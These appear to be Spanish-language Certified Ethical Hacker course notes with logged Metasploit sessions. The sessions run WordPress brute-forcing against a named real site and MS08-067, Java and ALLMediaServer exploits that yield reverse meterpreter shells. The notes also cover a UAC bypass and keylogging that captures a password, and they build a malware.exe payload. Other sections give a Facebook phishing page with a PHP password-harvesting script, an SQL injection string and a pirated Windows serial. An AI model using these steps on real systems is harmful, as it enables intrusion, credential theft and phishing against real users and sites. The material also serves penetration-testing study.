5/25/2018 Apuntes Ceh
1/14
APUNTES CEH
NO HAY UNA CULTURA DE DAR CLICK!!!
Busqueda detallada por google
allinurl php?id=
allinurl: unillanos.edu.co filetype:pdf
site: unillanos.edu.co -> trae subdominios
allintitle:*/Index of
allinurl: /wp-admin.php?
buscar herramienta foca trae metadata
ANALISIS DE VULNERABILIDADES
entrar a secpoint.com -> freetools
descargar el google hack db tools
unzip google-hack-db-tool-1.5.zip437 cd googleDB\ tool\ 1.5/
438 ls
439 ls db/
440 python googleDB-tool.py -s mkit.com.ar -o mkit.html db/vulnerabilities.txt
447 less mkit.html
448 geany mkit.html
DETECTAR INFO POR EL TELNET
root@bt:~/Downloads/googleDB tool 1.5# telnet www.google.com 80
Trying 173.194.37.146...
Connected to www.google.com.
Escape character is '^]'.
GET HTTP 1.1 /
HTTP/1.0 400 Bad Request
Content-Type: text/html; charset=UTF-8
Content-Length: 1419
Date: Mon, 05 May 2014 20:43:58 GMTServer: GFE/2.0
5/25/2018 Apuntes Ceh
2/14
root@bt:~/Downloads/googleDB tool 1.5# telnet www.unillanos.edu.co 80Trying 190.0.246.67...
Connected to unillanos.edu.co.
Escape character is '^]'.
get http 1.1 /HTTP/1.1 408 Request Time-out
Date: Mon, 05 May 2014 20:47:05 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1
408 Request Time-out
Request Time-out
Server timeout waiting for the HTTP request from the client.
Apache/2.2.22 (Ubuntu) Server at www.unillanos.edu.co Port 80
Connection closed by foreign host.
SCAN GENERANDO UN NULL SOBRE UN RANGO DE IPS
root@bt:~/Downloads/googleDB tool 1.5# nmap -sn -vv 192.168.72.1-255
Starting Nmap 6.01 ( http://nmap.org ) at 2014-05-05 17:55 ART
Initiating Ping Scan at 17:55
Scanning 255 hosts [4 ports/host]
Ping Scan Timing: About 15.25% done; ETC: 17:58 (0:02:52 remaining)
SCAN GENERANDO UN NULL SOBRE UN RANGO DE IPS
root@bt:~/Downloads/googleDB tool 1.5# nmap -sS -vv 192.168.72.1-255
METODOLOGIA DE ATAQUE
Verificar equipos activos Reconocer puertos abertos Identificar OS y servicios Anaalizar vulnerbilidades. Establecer mapa de ataque Configurar los proxies? Atacar
EXPLOITS
5/25/2018 Apuntes Ceh
3/14
FAMOSOS
MS08-067
MS09-050
MS10-020: HAY QUE TENER ACTIVO IIS.
EXPLOITSMETSPLOIT (esta hecho en ruby)
Debilidades de enumeracion como wordpress, Mensaje el usuario es incorrecto / ya me
ahorro mas de la mitad del trabajo.
ENTRAR
Cd /opt/metasploit#
EJEMPLO DE ATAQUE SOBRE WORDPRESS
msf > show modules
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > show options
Module options (auxiliary/scanner/http/wordpress_login_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current
database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
ENUMERATE_USERNAMES true yes Enumerate usernames
PASSWORD no A specific password to authenticate withPASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RANGE_END 10 no Last user id to enumerate
RANGE_START 1 no First user id to enumerate
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated byspace, one pair per line
USER_AS_PASS false no Try the username as the password for all users
5/25/2018 Apuntes Ceh
4/14
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Validate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(wordpress_login_enum) > set RHOSTS www.mkit.com.arRHOSTS => www.mkit.com.ar
msf auxiliary(wordpress_login_enum) > set TARGETURI /blog/
TARGETURI => /blog/
msf auxiliary(wordpress_login_enum) > exploit
[-] /blog/ does not seeem to be Wordpress site
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_login_enum) > set VHOST www.mkit.com.ar
VHOST => www.mkit.com.ar
msf auxiliary(wordpress_login_enum) > exploit
[*] /blog/ - WordPress Version 3.6.1 detected
[*] /blog/ - WordPress User-Enumeration - Running User Enumeration
[+] /blog/ - Found user 'kacho' with id 1
[+] /blog/ - Found user 'chino' with id 2
[+] /blog/ - Found user 'mkit' with id 3
[+] /blog/ - Found user 'nutria' with id 4
[*] /blog/ - Usernames stored in:
/root/.msf4/loot/20140505194954_default_74.63.249.67_wordpress.users_146048.txt
[*] /blog/ - WordPress User-Validation - Running User Validation
[*] /blog/ - WordPress User-Validation - Checking Username:''[-] /blog/ - WordPress User-Validation - Invalid Username: ''
[*] /blog/ - WordPress Brute Force - Running Bruteforce
[*] /blog/ - Brute-forcing previously found accounts...
[*] /blog/ - WordPress Brute Force - Trying username:'kacho' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'kacho'
[*] /blog/ - WordPress Brute Force - Trying username:'chino' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'chino'
[*] /blog/ - WordPress Brute Force - Trying username:'mkit' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'mkit'
[*] /blog/ - WordPress Brute Force - Trying username:'nutria' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'nutria'[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_login_enum) >back
msf>clear
OTRO ATAQUE:
msf> search ms08
soft Internet Explorer Data Binding Memory Corruption
exploit/windows/smb/ms08_067_netapi
5/25/2018 Apuntes Ceh
5/14
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.237.2
RHOST => 192.168.237.2
msf exploit(ms08_067_netapi) > show targetsmsf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.2 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
flective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter
(Reflective Injection), Reverse All-Port TCP Stager
msf exploit(ms08_067_netapi) > set payload windows/patchupmeterpreter/bind_ipv6_tcp
payload => windows/patchupmeterpreter/bind_ipv6_tcp
set LHOST 192.168.237.1 (maquina atacante)
set LPORT 1234
exploit
TALLER METERPRETER CORREGIDO
oot@bt:~# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%
%% %%%
5/25/2018 Apuntes Ceh
6/14
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%
%% %% %%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%
%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%
%% %%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%%
%%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %%
%%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]
+ -- --=[ 1295 exploits - 695 auxiliary - 207 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.237.129
RHOST => 192.168.237.129
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.237.128
LHOST => 192.168.237.128
msf exploit(ms08_067_netapi) > set LPORT 1234
LPORT => 1234
msf exploit(ms08_067_netapi) > show aoptions
[-] Invalid parameter "aoptions", use "show -h" for more information
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
5/25/2018 Apuntes Ceh
7/14
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.237.128 yes The listen address
LPORT 1234 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > rexploit[*] Reloading module...
[*] Started reverse handler on 192.168.237.128:1234[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.237.129
[*] Meterpreter session 1 opened (192.168.237.128:1234 -> 192.168.237.129:1027) at 2014-
05-06 12:47:59 -0300
meterpreter > getpid
Current pid: 828meterpreter >
TALLER MARTES
Serial xp RHKG3 8YW4W 4RHJG 83M4Y 7X9GW
Instalar windows 7.
Entrar ahttp://pastebin.com/4ZZdFLuUy descargar
http://pastebin.com/4ZZdFLuUhttp://pastebin.com/4ZZdFLuUhttp://pastebin.com/4ZZdFLuUhttp://pastebin.com/4ZZdFLuU5/25/2018 Apuntes Ceh
8/14
w32-exec-calc-shellcode.bin
jre-7u7-windows-i586-iftw.exe
ALLMediaServer.exe
METERPRETER EN WINDOWS 7 Y JAVA 7
root@bt:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]
+ -- --=[ 1295 exploits - 695 auxiliary - 207 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
msf > use exploit/multi/browser/java_jre17_jaxws
msf exploit(java_jre17_jaxws) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_jre17_jaxws) > set URIPATH /soyunarchivolindo.phpURIPATH => /soyunarchivolindo.php
msf exploit(java_jre17_jaxws) > set target 1
target => 1
msf exploit(java_jre17_jaxws) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(java_jre17_jaxws) > set LHOST 192.168.237.128
LHOST => 192.168.237.128
msf exploit(java_jre17_jaxws) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.237.128:4444[*] Using URL: http://0.0.0.0:80/soyunarchivolindo.php
[*] Local IP: http://192.168.237.128:80/soyunarchivolindo.php
[*] Server started.
AQU SE EJECUTA EL IE A LA RUTE DEL PHP:http://192.168.237.128:80/soyunarchivolindo.php
msf exploit(java_jre17_jaxws) > [*] 192.168.237.132 java_jre17_jaxws - Java Applet JAX-WS
Remote Code Execution handling request
[*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar
[*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar[*] Sending stage (769536 bytes) to 192.168.237.132
5/25/2018 Apuntes Ceh
9/14
[*] Meterpreter session 1 opened (192.168.237.128:4444 -> 192.168.237.132:49224) at 2014-
05-06 13:33:44 -0300
msf exploit(java_jre17_jaxws) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST=192.168.237.128 LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system....
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 192.168.237.128:4546 with UACBypass in effect...
[*] C:\Users\felcor\AppData\Local\Temp\QHayEz.exe /c %TEMP%\siwDGh.exe
meterpreter > [*] Meterpreter session 2 opened (192.168.237.128:4546 ->
192.168.237.132:49225) at 2014-05-06 13:36:01 -0300
meterpreter > sessions -i 2
[-] Unknown command: sessions.
meterpreter > sessions -i
[-] Unknown command: sessions.
meterpreter > sessions -i 2
[-] Unknown command: sessions.
meterpreter > sessions -i -2
[-] Unknown command: sessions.
meterpreter > sessions -i
[-] Unknown command: sessions.meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.237.132 - Meterpreter session 1 closed. Reason: User exit
msf exploit(java_jre17_jaxws) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------2 meterpreter x86/win32 PC\felcor @ PC 192.168.237.128:4546 -> 192.168.237.132:49225
(192.168.237.132)
msf exploit(java_jre17_jaxws) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 3800 created.
Channel 1 created.
Microsoft Windows [Versin 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
5/25/2018 Apuntes Ceh
10/14
C:\Windows\System32>
EXPLOIT DE ALLMEDI A SERVER
msf > search allmediaserver
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8
Buffer Overflow
msf >
msf > use exploit/windows/misc/allmediaserver_bof
msf exploit(allmediaserver_bof) > show options
Module options (exploit/windows/misc/allmediaserver_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 888 yes The target port
Exploit target:
Id Name
-- ----
1 ALLMediaServer 0.8 / Windows 7 SP1 - English
msf exploit(allmediaserver_bof) > set RHOST 192.168.237.132
RHOST => 192.168.237.132
msf exploit(allmediaserver_bof) > show options
Module options (exploit/windows/misc/allmediaserver_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.132 yes The target address
RPORT 888 yes The target port
Exploit target:
5/25/2018 Apuntes Ceh
11/14
Id Name
-- ----
1 ALLMediaServer 0.8 / Windows 7 SP1 - English
msf exploit(allmediaserver_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(allmediaserver_bof) > set LHOST 192.168.237.128
LHOST => 192.168.237.128
msf exploit(allmediaserver_bof) > show options
Module options (exploit/windows/misc/allmediaserver_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.132 yes The target addressRPORT 888 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.237.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 ALLMediaServer 0.8 / Windows 7 SP1 - English
msf exploit(allmediaserver_bof) > exploit
[*] Started reverse handler on 192.168.237.128:4444[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (769536 bytes) to 192.168.237.132
[*] Meterpreter session 1 opened (192.168.237.128:4444 -> 192.168.237.132:49166) at 2014-
05-06 13:53:33 -0300
meterpreter > shell
Process 2688 created.
Channel 1 created.
Microsoft Windows [Versin 6.1.7601]Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Program Files (x86)\ALLMediaServer>
5/25/2018 Apuntes Ceh
12/14
_________________________________________
DESDE EL METERPRETER PUEDO EJECUTAR EL
Keyscan_start
Keyscan_dump
Keyscan_stop
Screenshot
Ejemplo:
meterpreter > keyscan_startStarting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
usuariofe
felipe 12345123
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > screenshot
Screenshot saved to: /root/zKlrQWxJ.jpeg
meterpreter >
_________________________________________
ALTERNATIVA A LA CONSOLA DE MSFCONSOLE:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.237.132
LPORT=1234 x > malware.exe
PHISHING
COPIAR ARCHIVO login.php de facebook
Modificar el action por auth.php,
CREAR ARCHIVO DE ACTION
root@bt:~# cat /var/www/out.php
5/25/2018 Apuntes Ceh
13/14
$myfile = fopen("passwords.txt","a+");
fwrite($myfile,$_POST['email']." : ".$_POST['pass']."\n");
?>
Enmascarar URL con facebook
www.facebook.comAAAAAAAAwww.otro.com
____________________________________
SEGURIDAD WEB
Dos tipos
1. SQL INJECTION2. Cross-Site Scripting (XSS)
VER IMAGEN DE SQL INJECTION!!!
Herramientas: sqlmap, sqlninja.Hay analizadores sobre cada cms. En backtrack : pentest->
cms..
Sql para busquedas que entreguen varios registros.
' OR '1'='1
Revisar mysql out file
Hacer una shell en php y tratar de subirla: hay otras mas avanzadas
5/25/2018 Apuntes Ceh
14/14
El navegador tiene extensiones de gestion de cookiescookie editor!
Herramienta : gresasemonkey addson para firefox y bajar el script injector! Donde ingreso
la captura dump del wireshark.
Buscar session de hitjacking mkit argenteinawww.mkit.com.ar/blog.
backup.dedalo.in
ver paginas de :
sniffer labs de bolivia
dragonjar
security by default
http://www.mkit.com.ar/bloghttp://www.mkit.com.ar/bloghttp://www.mkit.com.ar/bloghttp://www.mkit.com.ar/blogTop Related